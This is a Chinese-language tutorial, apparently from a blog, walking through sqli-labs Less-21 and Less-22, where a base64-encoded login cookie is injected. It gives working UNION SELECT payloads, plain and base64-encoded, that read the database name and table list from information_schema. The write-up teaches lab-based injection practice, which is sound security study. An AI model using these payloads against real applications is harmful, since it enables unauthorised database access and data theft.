Less2122(基于base64的cookie注入)

目前已经完成了Basic Challenges,相信小伙伴们对于SQL注入也有了一定程度的理解。但是&＃xff0c;还是脱离不了小白的称号&＃xff0c;那么今天我们就向Advanced Injections进军。

首先还是先登录进去看一下情况&＃xff0c;

这一关卡和Less20的手法其实是一摸一样的&＃xff0c;只不过多了一道加密解密的步骤。通过观察这个COOKIE可以判断出来是一个加密过后的密文&＃xff0c;而题目也给出了是base64加密&＃xff0c;那么我们就把这个复制下来解密一下看看。

可以看到YWRtaW4&＃61;其实就是admin通过base64加密得到的。那么此时&＃xff0c;这道题就变成了Less20

在这里我们要知道&＃xff0c;此时我们的浏览器发送给服务器的COOKIE是一段密文&＃xff0c;当服务器端的处理程序拿到我们发送的COOKIE的时候&＃xff0c;要先经过解密&＃xff0c;然后才会带入到SQL语句中执行。因此我们需要将自己构造的SQL注入语句通过base64加密发送。

首先&＃xff0c;来判断一下uname的类型。

根据&＃39;admin&＃39;&＃39;) LIMIT 0,1可以判断出uname是用(&＃39;&＃39;)包裹的。然后我们通过构造SQL闭合&＃xff0c;使用联合注入查询&＃xff0c;进行查询。这里就列举一个查数据表的语句演示一下&＃xff1a;
&＃39;) union select 1, database(), (select group_concat(table_name) from information_schema.tables where table_schema&＃61;"security") #

将以上语句经过base64编码后&＃xff1a;
JykgdW5pb24gc2VsZWN0IDEsIGRhdGFiYXNlKCksIChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IikgIw&＃61;&＃61;
把我们的COOKIE进行更改&＃xff0c;

然后&＃xff0c;刷新页面&＃xff0c;即可得到上图的结果。成功的得到了当前使用的数据库的名字为security&＃xff0c;和security下有哪些数据表。

Less-22和Less21手法是完全一样的&＃xff0c;只不过21的uname使用(&＃39;&＃39;)闭合&＃xff0c;我们需要构造&＃39;) union select xxxx #来进行注入。

而Less22的uname使用双引号""闭合&＃xff0c;我们需要使用" union select xxx #注入。

下面给出一个例子&＃xff1a;
明文&＃xff1a;" union select 1, database(), (select group_concat(table_name) from information_schema.tables where table_schema&＃61;"security") #

密文&＃xff1a;IiB1bmlvbiBzZWxlY3QgMSwgZGF0YWJhc2UoKSwgKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiKSAj

结果&＃xff1a;